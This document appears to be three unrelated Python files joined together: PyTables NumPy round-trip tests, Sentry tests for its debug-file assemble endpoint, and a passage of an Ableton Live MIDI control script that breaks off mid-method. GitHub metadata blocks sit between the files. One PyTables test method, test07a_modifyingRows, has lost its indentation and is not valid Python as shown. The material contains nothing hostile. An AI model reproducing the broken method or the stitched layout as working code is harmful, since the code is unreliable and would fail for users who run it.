        self.assertEqual(data.dtype.descr, npdata.dtype.descr)
        if common.verbose:
            print("npdata-->", npdata)
            print("data-->", data)
        # A copy() is needed in case the buffer would be in different segments
        self.assertEqual(bytes(data.copy().data), bytes(npdata.data))

    def test06b_assignNestedColumn(self):
        """Checking assigning a nested column (using the .cols accessor)."""
        table = self.h5file.root.table
        dtype = [('value', '%sc16' % byteorder),
                 ('y2', '%sf8' % byteorder),
                 ('Info2',
                  [('name', '|S2'),
                   ('value', '%sc16' % byteorder, (2,)),
                   ('y3', '%sf8' % byteorder, (2,))]),
                 ('name', '|S2'),
                 ('z2', '|u1')]
        npdata = np.zeros((3,), dtype=dtype)
        #self.assertRaises(NotImplementedError,
        #                  table.cols.Info.__setitem__, slice(3,6,1), npdata)
        table.cols.Info[3:6] = npdata
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table.cols.Info[3:6]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the type
        self.assertEqual(data.dtype.descr, npdata.dtype.descr)
        if common.verbose:
            print("npdata-->", npdata)
            print("data-->", data)
        # A copy() is needed in case the buffer would be in different segments
        self.assertEqual(bytes(data.copy().data), bytes(npdata.data))
def test07a_modifyingRows(self):
"""Checking modifying several rows at once (using modify_rows)."""
table = self.h5file.root.table
# Read a chunk of the table
chunk = table[0:3]
# Modify it somewhat
chunk['y'][:] = -1
table.modify_rows(3, 6, 1, rows=chunk)
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
ycol = np.zeros((3, 2, 2), 'float64')-1
data = table.cols.y[3:6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, ycol.dtype.descr)
if common.verbose:
print("ycol-->", ycol)
print("data-->", data)
self.assertTrue(allequal(ycol, data, "numpy"))
def test07b_modifyingRows(self):
    """Checking modifying several rows at once (using cols accessor)."""
    table = self.h5file.root.table
    # Read a chunk of the table
    chunk = table[0:3]
    # Modify it somewhat
    chunk['y'][:] = -1
    # Assign whole rows 3..5 through the cols accessor this time.
    table.cols[3:6] = chunk
    if self.close:
        self._reopen(mode='a')
        table = self.h5file.root.table
    # Check that some column has been actually modified
    ycol = np.zeros((3, 2, 2), 'float64')-1
    data = table.cols.y[3:6]
    if common.verbose:
        print("Type of read:", type(data))
        print("Description of the record:", data.dtype.descr)
        print("First 3 elements of read:", data[:3])
        print("Length of the data read:", len(data))
    # Check that both NumPy objects are equal
    self.assertTrue(isinstance(data, np.ndarray))
    # Check the type
    self.assertEqual(data.dtype.descr, ycol.dtype.descr)
    if common.verbose:
        print("ycol-->", ycol)
        print("data-->", data)
    self.assertTrue(allequal(ycol, data, "numpy"))
def test08a_modifyingRows(self):
    """Checking modifying just one row at once (using modify_rows)."""
    table = self.h5file.root.table
    # Read a chunk of the table
    chunk = table[3:4]
    # Modify it somewhat
    chunk['y'][:] = -1
    # Write the single modified row over row 6.
    table.modify_rows(6, 7, 1, chunk)
    if self.close:
        self._reopen(mode='a')
        table = self.h5file.root.table
    # Check that some column has been actually modified
    ycol = np.zeros((2, 2), 'float64')-1
    data = table.cols.y[6]
    if common.verbose:
        print("Type of read:", type(data))
        print("Description of the record:", data.dtype.descr)
        print("First 3 elements of read:", data[:3])
        print("Length of the data read:", len(data))
    # Check that both NumPy objects are equal
    self.assertTrue(isinstance(data, np.ndarray))
    # Check the type
    self.assertEqual(data.dtype.descr, ycol.dtype.descr)
    if common.verbose:
        print("ycol-->", ycol)
        print("data-->", data)
    self.assertTrue(allequal(ycol, data, "numpy"))
def test08b_modifyingRows(self):
    """Checking modifying just one row at once (using cols accessor)."""
    table = self.h5file.root.table
    # Read a chunk of the table
    chunk = table[3:4]
    # Modify it somewhat
    chunk['y'][:] = -1
    # Assign the single row through the cols accessor this time.
    table.cols[6] = chunk
    if self.close:
        self._reopen(mode='a')
        table = self.h5file.root.table
    # Check that some column has been actually modified
    ycol = np.zeros((2, 2), 'float64')-1
    data = table.cols.y[6]
    if common.verbose:
        print("Type of read:", type(data))
        print("Description of the record:", data.dtype.descr)
        print("First 3 elements of read:", data[:3])
        print("Length of the data read:", len(data))
    # Check that both NumPy objects are equal
    self.assertTrue(isinstance(data, np.ndarray))
    # Check the type
    self.assertEqual(data.dtype.descr, ycol.dtype.descr)
    if common.verbose:
        print("ycol-->", ycol)
        print("data-->", data)
    self.assertTrue(allequal(ycol, data, "numpy"))
def test09a_getStrings(self):
    """Checking the return of string columns with spaces."""
    if self.close:
        self._reopen(mode='a')
    table = self.h5file.root.table
    # Coordinates of every row whose 'color' field equals b"ab".
    rdata = table.get_where_list('color == b"ab"')
    data = table.read_coordinates(rdata)
    if common.verbose:
        print("Type of read:", type(data))
        print("Description of the record:", data.dtype.descr)
        print("First 3 elements of read:", data[:3])
    # Check that both NumPy objects are equal
    self.assertTrue(isinstance(data, np.ndarray))
    # Check that all columns have been selected
    self.assertEqual(len(data), 100)
    # Finally, check that the contents are ok
    for idata in data['color']:
        self.assertEqual(idata, np.array("ab", dtype="|S4"))
def test09b_getStrings(self):
    """Checking the return of string columns with spaces.

    (modify)
    """
    if self.close:
        self._reopen(mode='a')
    table = self.h5file.root.table
    # Overwrite the first 50 rows with a value that has a trailing space.
    for i in range(50):
        table.cols.color[i] = "a "
    table.flush()
    data = table[:]
    if common.verbose:
        print("Type of read:", type(data))
        print("Description of the record:", data.dtype.descr)
        print("First 3 elements of read:", data[:3])
    # Check that both NumPy objects are equal
    self.assertTrue(isinstance(data, np.ndarray))
    # Check that all columns have been selected
    self.assertEqual(len(data), 100)
    # Finally, check that the contents are ok
    for i in range(100):
        idata = data['color'][i]
        if i >= 50:
            # Untouched rows keep their original value.
            self.assertEqual(idata, np.array("ab", dtype="|S4"))
        else:
            # Modified rows must keep the trailing space.
            self.assertEqual(idata, np.array("a ", dtype="|S4"))
def test09c_getStrings(self):
    """Checking the return of string columns with spaces.

    (append)
    """
    if self.close:
        self._reopen(mode='a')
    table = self.h5file.root.table
    row = table.row
    # Append 50 new rows whose 'color' value carries a trailing space.
    for i in range(50):
        row["color"] = "a "  # note the trailing spaces
        row.append()
    table.flush()
    if self.close:
        # Full close/open cycle (not _reopen) so the appended rows are
        # read back through a completely fresh file handle.
        self.h5file.close()
        self.h5file = tables.open_file(self.h5fname, "a")
    data = self.h5file.root.table[:]
    if common.verbose:
        print("Type of read:", type(data))
        print("Description of the record:", data.dtype.descr)
        print("First 3 elements of read:", data[:3])
    # Check that both NumPy objects are equal
    self.assertTrue(isinstance(data, np.ndarray))
    # Check that all columns have been selected
    self.assertEqual(len(data), 150)
    # Finally, check that the contents are ok
    for i in range(150):
        idata = data['color'][i]
        if i < 100:
            # Pre-existing rows keep their original value.
            self.assertEqual(idata, np.array("ab", dtype="|S4"))
        else:
            # Appended rows must keep the trailing space.
            self.assertEqual(idata, np.array("a ", dtype="|S4"))
class TableNativeFlavorOpenTestCase(TableNativeFlavorTestCase):
    """Run the native-flavor table tests without reopening the file."""
    close = 0
class TableNativeFlavorCloseTestCase(TableNativeFlavorTestCase):
    """Run the native-flavor table tests with a file reopen mid-test."""
    close = 1
class AttributesTestCase(common.TempFileMixin, TestCase):
    """Round-trip tests for NumPy arrays stored as HDF5 attributes."""

    def setUp(self):
        super(AttributesTestCase, self).setUp()
        # Attributes under test are attached to this freshly created group.
        self.h5file.create_group(self.h5file.root, 'group')

    def test01_writeAttribute(self):
        """Checking the creation of a numpy attribute."""
        attrs = self.h5file.root.group._v_attrs
        attrs.numpy1 = np.zeros((1, 1), dtype='int16')
        if self.close:
            self._reopen(mode='a')
            attrs = self.h5file.root.group._v_attrs
        # Read the attribute back and compare against a reference array.
        retrieved = attrs.numpy1
        expected = np.zeros((1, 1), dtype='int16')
        self.assertTrue(isinstance(retrieved, np.ndarray))
        self.assertEqual(retrieved.dtype.descr, expected.dtype.descr)
        if common.verbose:
            print("npcomp-->", expected)
            print("data-->", retrieved)
        self.assertTrue(allequal(expected, retrieved, "numpy"))

    def test02_updateAttribute(self):
        """Checking the modification of a numpy attribute."""
        attrs = self.h5file.root.group._v_attrs
        attrs.numpy1 = np.zeros((1, 2), dtype='int16')
        if self.close:
            self._reopen(mode='a')
            attrs = self.h5file.root.group._v_attrs
        # Overwrite the existing attribute and read it back.
        attrs.numpy1 = np.ones((1, 2), dtype='int16')
        retrieved = attrs.numpy1
        expected = np.ones((1, 2), dtype='int16')
        self.assertTrue(isinstance(retrieved, np.ndarray))
        self.assertEqual(retrieved.dtype.descr, expected.dtype.descr)
        if common.verbose:
            print("npcomp-->", expected)
            print("data-->", retrieved)
        self.assertTrue(allequal(expected, retrieved, "numpy"))
class AttributesOpenTestCase(AttributesTestCase):
    """Run the attribute tests without reopening the file."""
    close = 0
class AttributesCloseTestCase(AttributesTestCase):
    """Run the attribute tests with a file reopen mid-test."""
    close = 1
class StrlenTestCase(common.TempFileMixin, TestCase):
    """Check that fixed-width string cells preserve exact length/content."""

    def setUp(self):
        super(StrlenTestCase, self).setUp()
        group = self.h5file.create_group(self.h5file.root, 'group')
        tablelayout = {'Text': StringCol(itemsize=1000), }
        self.table = self.h5file.create_table(group, 'table', tablelayout)
        self.table.flavor = 'numpy'
        writer = self.table.row
        writer['Text'] = 'Hello Francesc!'  # XXX: check unicode --> bytes
        writer.append()
        writer['Text'] = 'Hola Francesc!'  # XXX: check unicode --> bytes
        writer.append()
        self.table.flush()

    def _refresh_table(self):
        # Optionally close/reopen the file and re-fetch the table node.
        if self.close:
            self._reopen(mode='a')
            self.table = self.h5file.root.group.table

    def _check_contents(self, first, second):
        # Both the lengths and the exact bytes must survive the round trip.
        self.assertEqual(len(first), len(b'Hello Francesc!'))
        self.assertEqual(len(second), len(b'Hola Francesc!'))
        self.assertEqual(first, b'Hello Francesc!')
        self.assertEqual(second, b'Hola Francesc!')

    def test01(self):
        """Checking the lengths of strings (read field)."""
        self._refresh_table()
        column = self.table.col('Text')
        if common.verbose:
            print("string1-->", column[0])
            print("string2-->", column[1])
        self._check_contents(column[0], column[1])

    def test02(self):
        """Checking the lengths of strings (read recarray)."""
        self._refresh_table()
        texts = self.table[:]['Text']
        self._check_contents(texts[0], texts[1])

    def test03(self):
        """Checking the lengths of strings (read recarray, row by row)."""
        self._refresh_table()
        self._check_contents(self.table[0]['Text'], self.table[1]['Text'])
class StrlenOpenTestCase(StrlenTestCase):
    """Run the string-length tests without reopening the file."""
    close = 0
class StrlenCloseTestCase(StrlenTestCase):
    """Run the string-length tests with a file reopen mid-test."""
    close = 1
def suite():
    """Build and return the unittest suite for this module."""
    theSuite = unittest.TestSuite()
    niter = 1
    # theSuite.addTest(unittest.makeSuite(StrlenOpenTestCase))
    # theSuite.addTest(unittest.makeSuite(Basic0DOneTestCase))
    # theSuite.addTest(unittest.makeSuite(GroupsArrayTestCase))
    standard_cases = (
        Basic0DOneTestCase,
        Basic0DTwoTestCase,
        Basic1DOneTestCase,
        Basic1DTwoTestCase,
        Basic1DThreeTestCase,
        Basic2DTestCase,
        GroupsArrayTestCase,
        TableReadTestCase,
        TableNativeFlavorOpenTestCase,
        TableNativeFlavorCloseTestCase,
        AttributesOpenTestCase,
        AttributesCloseTestCase,
        StrlenOpenTestCase,
        StrlenCloseTestCase,
    )
    for _ in range(niter):
        for case in standard_cases:
            theSuite.addTest(unittest.makeSuite(case))
        if common.heavy:
            theSuite.addTest(unittest.makeSuite(Basic10DTestCase))
            # The 32 dimensions case takes forever to run!!
            # theSuite.addTest(unittest.makeSuite(Basic32DTestCase))
    return theSuite
if __name__ == '__main__':
    # Allow running this test module standalone from the command line.
    common.parse_argv(sys.argv)
    common.print_versions()
    unittest.main(defaultTest='suite')
| {
"content_hash": "8c4e9e05f13c824c5f5cc390f5d31558",
"timestamp": "",
"source": "github",
"line_count": 1407,
"max_line_length": 79,
"avg_line_length": 36.42786069651741,
"alnum_prop": 0.5587661450813595,
"repo_name": "jack-pappas/PyTables",
"id": "68646870ece478ecdb51f37614c331b0206bda7a",
"size": "51279",
"binary": false,
"copies": "6",
"ref": "refs/heads/develop",
"path": "tables/tests/test_numpy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "901914"
},
{
"name": "C++",
"bytes": "97381"
},
{
"name": "CSS",
"bytes": "2717"
},
{
"name": "Gnuplot",
"bytes": "2104"
},
{
"name": "JavaScript",
"bytes": "3491"
},
{
"name": "Makefile",
"bytes": "11351"
},
{
"name": "Objective-C",
"bytes": "31966"
},
{
"name": "Python",
"bytes": "3594491"
},
{
"name": "Shell",
"bytes": "23613"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from mock import patch
from hashlib import sha1
from django.core.urlresolvers import reverse
from django.core.files.base import ContentFile
from sentry.models import ApiToken, FileBlob, File, FileBlobIndex, FileBlobOwner
from sentry.models.debugfile import ProjectDebugFile
from sentry.testutils import APITestCase
from sentry.tasks.assemble import (
assemble_dif,
assemble_file,
get_assemble_status,
set_assemble_status,
AssembleTask,
ChunkFileState,
)
class DifAssembleEndpoint(APITestCase):
    """Integration tests for the chunked debug-information-file (DIF)
    assemble endpoint."""

    def setUp(self):
        # Minimal org/team/project fixture plus a token with project:write
        # scope; every request below authenticates with this token.
        self.organization = self.create_organization(owner=self.user)
        self.token = ApiToken.objects.create(user=self.user, scope_list=["project:write"])
        self.team = self.create_team(organization=self.organization)
        self.project = self.create_project(
            teams=[self.team], organization=self.organization, name="foo"
        )
        self.url = reverse(
            "sentry-api-0-assemble-dif-files", args=[self.organization.slug, self.project.slug]
        )

    def test_assemble_json_schema(self):
        """Malformed payloads get 400; a minimal valid body is accepted."""
        # Top-level keys must be checksums, not arbitrary strings.
        response = self.client.post(
            self.url, data={"lol": "test"}, HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token)
        )
        assert response.status_code == 400, response.content

        # sha1() needs a bytes input so this also runs under Python 3.
        checksum = sha1(b"1").hexdigest()

        # The value for a checksum key must be a dict ...
        response = self.client.post(
            self.url,
            data={checksum: "test"},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 400, response.content

        # ... containing at least "name" and "chunks".
        response = self.client.post(
            self.url, data={checksum: {}}, HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token)
        )
        assert response.status_code == 400, response.content

        # Well-formed but unknown file: reported as NOT_FOUND, not an error.
        response = self.client.post(
            self.url,
            data={checksum: {"name": "dif", "chunks": []}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[checksum]["state"] == ChunkFileState.NOT_FOUND

    def test_assemble_check(self):
        """Full state machine: missing chunks -> assembling -> OK."""
        content = "foo bar".encode("utf-8")
        fileobj = ContentFile(content)
        # Put the file in small (3 byte) blobs to get several chunks.
        file1 = File.objects.create(name="baz.dSYM", type="default", size=7)
        file1.putfile(fileobj, 3)
        checksum = sha1(content).hexdigest()
        blobs = FileBlob.objects.all()
        checksums = []
        for blob in blobs:
            checksums.append(blob.checksum)
        # Request to see if the file is there.
        # The file exists but we have no ownership of the chunks yet.
        response = self.client.post(
            self.url,
            data={checksum: {"name": "dif", "chunks": checksums}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[checksum]["state"] == ChunkFileState.NOT_FOUND
        assert set(response.data[checksum]["missingChunks"]) == set(checksums)

        # Now we add ownership to the blobs.
        blobs = FileBlob.objects.all()
        for blob in blobs:
            FileBlobOwner.objects.create(blob=blob, organization=self.organization)

        # The request will start the job to assemble the file.
        response = self.client.post(
            self.url,
            data={checksum: {"name": "dif", "chunks": checksums}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[checksum]["state"] == ChunkFileState.CREATED
        assert response.data[checksum]["missingChunks"] == []

        # Finally, we simulate a successful assemble job.
        ProjectDebugFile.objects.create(
            file=file1,
            object_name="baz.dSYM",
            cpu_name="x86_64",
            project=self.project,
            debug_id="df449af8-0dcd-4320-9943-ec192134d593",
            code_id="DF449AF80DCD43209943EC192134D593",
        )
        set_assemble_status(AssembleTask.DIF, self.project.id, checksum, None)

        # Request now tells us that everything is alright.
        response = self.client.post(
            self.url,
            data={checksum: {"name": "dif", "chunks": checksums}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[checksum]["state"] == ChunkFileState.OK
        assert response.data[checksum]["missingChunks"] == []

        # An unknown checksum reports NOT_FOUND with its chunk missing.
        not_found_checksum = sha1(b"1").hexdigest()
        response = self.client.post(
            self.url,
            data={not_found_checksum: {"name": "dif", "chunks": [not_found_checksum]}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[not_found_checksum]["state"] == ChunkFileState.NOT_FOUND
        assert set(response.data[not_found_checksum]["missingChunks"]) == set([not_found_checksum])

    @patch("sentry.tasks.assemble.assemble_dif")
    def test_assemble(self, mock_assemble_dif):
        """Chunk ownership gating and the kwargs handed to the async task."""
        content1 = "foo".encode("utf-8")
        fileobj1 = ContentFile(content1)
        checksum1 = sha1(content1).hexdigest()

        content2 = "bar".encode("utf-8")
        fileobj2 = ContentFile(content2)
        checksum2 = sha1(content2).hexdigest()

        content3 = "baz".encode("utf-8")
        fileobj3 = ContentFile(content3)
        checksum3 = sha1(content3).hexdigest()

        total_checksum = sha1(content2 + content1 + content3).hexdigest()

        # The order here is on purpose because we check for the order of checksums
        blob1 = FileBlob.from_file(fileobj1)
        FileBlobOwner.objects.get_or_create(organization=self.organization, blob=blob1)
        blob3 = FileBlob.from_file(fileobj3)
        FileBlobOwner.objects.get_or_create(organization=self.organization, blob=blob3)
        blob2 = FileBlob.from_file(fileobj2)

        # We make a request now but we are missing ownership for chunk 2.
        response = self.client.post(
            self.url,
            data={total_checksum: {"name": "test", "chunks": [checksum2, checksum1, checksum3]}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[total_checksum]["state"] == ChunkFileState.NOT_FOUND
        assert response.data[total_checksum]["missingChunks"] == [checksum2]

        # We add ownership to chunk 2.
        FileBlobOwner.objects.get_or_create(organization=self.organization, blob=blob2)

        # New request: ownership for all chunks is there but the file does
        # not exist yet, so assembling is scheduled.
        response = self.client.post(
            self.url,
            data={total_checksum: {"name": "test", "chunks": [checksum2, checksum1, checksum3]}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[total_checksum]["state"] == ChunkFileState.CREATED
        assert response.data[total_checksum]["missingChunks"] == []

        chunks = [checksum2, checksum1, checksum3]
        mock_assemble_dif.apply_async.assert_called_once_with(
            kwargs={
                "project_id": self.project.id,
                "name": "test",
                "chunks": chunks,
                "checksum": total_checksum,
                "debug_id": None,
            }
        )

        # Run the assembly synchronously and verify the resulting file.
        file = assemble_file(
            AssembleTask.DIF, self.project, "test", total_checksum, chunks, "project.dif"
        )[0]
        status, _ = get_assemble_status(AssembleTask.DIF, self.project.id, total_checksum)
        assert status != ChunkFileState.ERROR
        assert file.checksum == total_checksum

        file_blob_index = FileBlobIndex.objects.all()
        assert len(file_blob_index) == 3

    def test_dif_response(self):
        """A successfully assembled DIF reports its metadata."""
        sym_file = self.load_fixture("crash.sym")
        blob1 = FileBlob.from_file(ContentFile(sym_file))
        total_checksum = sha1(sym_file).hexdigest()
        chunks = [blob1.checksum]

        assemble_dif(
            project_id=self.project.id, name="crash.sym", checksum=total_checksum, chunks=chunks
        )

        response = self.client.post(
            self.url,
            data={total_checksum: {"name": "test.sym", "chunks": chunks}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[total_checksum]["state"] == ChunkFileState.OK
        assert response.data[total_checksum]["dif"]["cpuName"] == "x86_64"
        assert (
            response.data[total_checksum]["dif"]["uuid"] == "67e9247c-814e-392b-a027-dbde6748fcbf"
        )

    def test_dif_error_response(self):
        """Assembling garbage surfaces an ERROR state with details."""
        # Bytes (not str) so sha1() works on both Python 2 and 3.
        sym_file = b"fail"
        blob1 = FileBlob.from_file(ContentFile(sym_file))
        total_checksum = sha1(sym_file).hexdigest()
        chunks = [blob1.checksum]

        assemble_dif(
            project_id=self.project.id, name="test.sym", checksum=total_checksum, chunks=chunks
        )

        response = self.client.post(
            self.url,
            data={total_checksum: {"name": "test.sym", "chunks": []}},
            HTTP_AUTHORIZATION=u"Bearer {}".format(self.token.token),
        )
        assert response.status_code == 200, response.content
        assert response.data[total_checksum]["state"] == ChunkFileState.ERROR
        assert response.data[total_checksum]["detail"].startswith(
            "Unsupported debug information file"
        )
| {
"content_hash": "1bd2a6ed596516385e7499728f296994",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 100,
"avg_line_length": 39.97551020408163,
"alnum_prop": 0.6197672044108637,
"repo_name": "mvaled/sentry",
"id": "27f65e2063d9517192cde9750f2a343606e9d2e7",
"size": "9794",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/sentry/api/endpoints/test_dif_assemble.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "226439"
},
{
"name": "Dockerfile",
"bytes": "6431"
},
{
"name": "HTML",
"bytes": "173429"
},
{
"name": "JavaScript",
"bytes": "9314175"
},
{
"name": "Lua",
"bytes": "65885"
},
{
"name": "Makefile",
"bytes": "9225"
},
{
"name": "Python",
"bytes": "50385401"
},
{
"name": "Ruby",
"bytes": "168"
},
{
"name": "Shell",
"bytes": "5685"
},
{
"name": "TypeScript",
"bytes": "773664"
}
],
"symlink_target": ""
} |
import math
import MIDI
from Control import Control, ignore_cc_zero
from mappings import mappings
class GlobalControl(Control):
    """MIDI bindings for global transport, session, clip, track and device
    actions on the selected track."""

    def __init__(self, c_instance, selected_track_controller):
        Control.__init__(self, c_instance, selected_track_controller)
        self.show_message('Global controls initialized')
        # Accumulators used to slow down endless-encoder scrolling
        # (see scroll_tracks / scroll_scenes).
        self.track_buffer = 0
        self.scene_buffer = 0
        self.song.view.add_selected_track_listener(self.on_track_selected)

    def get_midi_bindings(self):
        """Return (mapping_name, handler) pairs consumed by Control."""
        # NOTE: a duplicate ("scrub_by", ...) entry was removed here; it
        # bound the same handler to the same name twice.
        return (
            ("scrub_by", self.scrub_by),
            ("midi_recording_quantization", self.midi_recording_quantization),
            ("play", self.play),
            ("pause", self.pause),
            ("stop", self.stop),
            ("overdub_on", self.toggle_overdub),
            ("overdub_off", self.toggle_overdub),
            ("metronome_on", self.toggle_metronome),
            ("metronome_off", self.toggle_metronome),
            ("undo", self.undo),
            ("redo", self.redo),
            ("session_automation_rec_on", self.toggle_session_automation_record),
            ("session_automation_rec_off", self.toggle_session_automation_record),
            ("fire_next_scene", self.fire_next_scene),

            # Session
            ("scroll_tracks", self.scroll_tracks),
            ("scroll_scenes", self.scroll_scenes),
            ("prev_track", self.select_prev_track),
            ("next_track", self.select_next_track),

            # Device
            ("macro_1", lambda value, mode, status: self.set_device_param(1, value)),
            ("macro_2", lambda value, mode, status: self.set_device_param(2, value)),
            ("macro_3", lambda value, mode, status: self.set_device_param(3, value)),
            ("macro_4", lambda value, mode, status: self.set_device_param(4, value)),
            ("macro_5", lambda value, mode, status: self.set_device_param(5, value)),
            ("macro_6", lambda value, mode, status: self.set_device_param(6, value)),
            ("macro_7", lambda value, mode, status: self.set_device_param(7, value)),
            ("macro_8", lambda value, mode, status: self.set_device_param(8, value)),

            # Clip
            ("delete_clip", self.delete_clip),
            ("duplicate_clip", self.duplicate_clip),
            ("double_clip", self.double_clip),
            ("create_clip", self.create_clip),

            # Track
            ("volume", self.set_volume),
            ("pan", self.set_pan),
            ("send_a", lambda value, mode, status: self.set_send(0, value)),
            ("send_b", lambda value, mode, status: self.set_send(1, value)),
            ("send_c", lambda value, mode, status: self.set_send(2, value)),
            ("send_d", lambda value, mode, status: self.set_send(3, value)),
            ("arm", self.toggle_arm),
            ("unarm", self.toggle_arm),
            ("solo", self.toggle_solo),
            ("unsolo", self.toggle_solo),
            ("mute", self.toggle_mute),
            ("unmute", self.toggle_mute),
        )

    def scrub_by(self, value, mode, status):
        # Move the playback position by the (signed) encoder value.
        # (A second, identical definition of this method was removed; it
        # silently shadowed this one.)
        self.song.scrub_by(value)

    @ignore_cc_zero
    def play(self, value, mode, status):
        # Start from the beginning only if we have never played yet;
        # otherwise resume from the current position.
        if self.song.current_song_time == 0:
            self.song.start_playing()
        else:
            self.song.continue_playing()

    @ignore_cc_zero
    def pause(self, value, mode, status):
        self.song.stop_playing()

    @ignore_cc_zero
    def stop(self, value, mode, status):
        self.song.stop_playing()
        # Send a note-off for the play key so the controller LED clears.
        self.c_instance.send_midi((128, mappings["play"].key, 0))

    @ignore_cc_zero
    def toggle_overdub(self, value, mode, status):
        self.song.overdub = not self.song.overdub

    @ignore_cc_zero
    def toggle_metronome(self, value, mode, status):
        # NOTE(review): despite the name this sets the metronome from the
        # CC value rather than flipping it (metronome_on/off both map here).
        self.song.metronome = bool(value)

    @ignore_cc_zero
    def undo(self, value, mode, status):
        self.song.undo()

    @ignore_cc_zero
    def redo(self, value, mode, status):
        self.song.redo()

    def toggle_session_automation_record(self, value, mode, status):
        self.song.session_automation_record = not self.song.session_automation_record

    def scroll_tracks(self, value, *args):
        # change track on every 5th value change for ease of use
        # if the knob is turned to the other side than before, reset:
        if math.copysign(1, self.track_buffer) != math.copysign(1, value):
            self.track_buffer = 0
        self.track_buffer += value
        # if we reached the threshold, change track using the value (+/- 1) and reset
        if abs(self.track_buffer) == 5:
            self.song.view.selected_track = self.get_track_by_delta(value)
            self.track_buffer = 0

    def select_next_track(self, *args):
        self.song.view.selected_track = self.get_track_by_delta(1)

    def select_prev_track(self, *args):
        self.song.view.selected_track = self.get_track_by_delta(-1)

    def get_track_by_delta(self, delta):
        """Return the track *delta* positions away, clamped to the ends."""
        tracks = self.song.tracks + self.song.return_tracks + (self.song.master_track,)
        current_index = tracks.index(self.song.view.selected_track)
        new_index = max(0, min(current_index + delta, len(tracks) - 1))
        return tracks[new_index]

    def scroll_scenes(self, value, *args):
        # see scroll_tracks()
        if math.copysign(1, self.scene_buffer) != math.copysign(1, value):
            self.scene_buffer = 0
        self.scene_buffer += value
        if abs(self.scene_buffer) == 5:
            self.song.view.selected_scene = self.get_scene_by_delta(value)
            self.scene_buffer = 0

    def get_scene_by_delta(self, delta):
        """Return the scene *delta* positions away, clamped to the ends."""
        scene = self.song.view.selected_scene
        scenes = self.song.scenes
        current_index = list(scenes).index(scene)
        new_index = max(0, min(current_index + delta, len(scenes) - 1))
        return scenes[new_index]

    def delete_clip(self, value, mode, status):
        slot = self.song.view.highlighted_clip_slot
        if slot is not None and slot.has_clip:
            slot.delete_clip()

    def duplicate_clip(self, value, mode, status):
        slot = self.song.view.highlighted_clip_slot
        # Guard against no highlighted slot, consistent with delete_clip.
        if slot is not None and slot.has_clip:
            track = self.song.view.selected_track
            # duplicate_clip_slot returns the index of the new slot;
            # highlight it so further actions target the copy.
            new_index = track.duplicate_clip_slot(list(track.clip_slots).index(slot))
            self.song.view.highlighted_clip_slot = track.clip_slots[new_index]

    def double_clip(self, value, mode, status):
        slot = self.song.view.highlighted_clip_slot
        track = self.song.view.selected_track
        # Guard against no highlighted slot, consistent with delete_clip.
        if slot is not None and slot.has_clip:
            slot_index = track.playing_slot_index
            if slot_index >= 0 and track.clip_slots[slot_index].has_clip:
                # Double the loop length of the currently playing clip.
                track.clip_slots[slot_index].clip.duplicate_loop()

    def create_clip(self, value, mode, status):
        # TODO: show message if not a MIDI track
        slot = self.song.view.highlighted_clip_slot
        slot.create_clip(4)

    @ignore_cc_zero
    def toggle_arm(self, value, mode, status):
        self.song.view.selected_track.arm = bool(value)

    @ignore_cc_zero
    def toggle_mute(self, value, mode, status):
        self.song.view.selected_track.mute = bool(value)

    @ignore_cc_zero
    def toggle_solo(self, value, mode, status):
        self.song.view.selected_track.solo = bool(value)

    def set_volume(self, value, mode, status):
        # Relative change, clamped to the 0..1 range of the mixer fader.
        current_value = self.song.view.selected_track.mixer_device.volume.value
        self.song.view.selected_track.mixer_device.volume.value = max(
            0.0,
            min(1.0, current_value + (value / 200.0))
        )

    def set_pan(self, value, mode, status):
        # Relative change, clamped to the -1..1 panning range.
        current_value = self.song.view.selected_track.mixer_device.panning.value
        self.song.view.selected_track.mixer_device.panning.value = max(
            -1.0,
            min(1.0, current_value + (value / 100.0))
        )

    def set_send(self, i, value):
        """Nudge send *i* of the selected track by a relative *value*."""
        if i >= len(self.song.view.selected_track.mixer_device.sends):
            return
        param = self.song.view.selected_track.mixer_device.sends[i]
        if param:
            param.value = max(0.0, min(1.0, param.value + (value / 100.0)))

    def set_device_param(self, i, value):
        """Nudge parameter *i* of the selected device, scaled to its range."""
        device = self.song.view.selected_track.view.selected_device
        if not device:
            return
        param = device.parameters[i]
        if not param:
            return
        param_range = param.max - param.min
        param.value = max(param.min, min(param.max, param.value + param_range * value / 127.0))

    @ignore_cc_zero
    def midi_recording_quantization(self, value, mode, status):
        # Labels indexed by the quantization value; fixed to match the
        # table documented in _get_quantization() (the old list had 11
        # entries for 9 values and mislabeled the combined settings).
